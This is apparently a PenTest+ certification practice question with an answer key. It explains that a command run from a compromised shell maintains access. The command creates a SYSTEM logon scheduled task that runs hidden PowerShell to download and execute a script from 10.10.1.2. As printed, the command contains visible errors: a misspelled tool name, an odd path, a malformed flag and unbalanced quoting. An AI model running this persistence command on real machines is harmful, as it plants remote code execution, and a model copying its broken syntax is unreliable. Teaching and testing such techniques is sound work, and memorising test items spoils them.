CompTIA PenTest+ (PT0-003) — Question 56

A tester obtained access to a computer using a SMB exploit and now has a shell access into the target computer. The tester runs the following on the obtained shell:

schtask /create /tn Updates /tr "C:\windows\syswow64\Windows\WindowsPowershell\v1.0\powershell.exe hidden -NoLogo -NoInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://10.10.1.2/asd')))'" /sc onlogon /ru System

Which of the following does this action accomplish?

Answer options

• A. Upgrades the shell performing a privilege escalation activity
• B. Uses the Windows Update service to move the shell connection and avoid detection
• C. Maintains access into the compromised computer
• D. Forwards all the communication from the compromised host to the host 10.10.1.2

Correct answer: C

Explanation

The command creates a scheduled task that runs on logon, which allows the tester to maintain access to the compromised computer even after the current session ends. Option A is incorrect because the command does not perform privilege escalation, while option B misinterprets the purpose of the command regarding Windows Update. Option D is also incorrect as the command does not forward communication, but rather executes a script from the specified URL.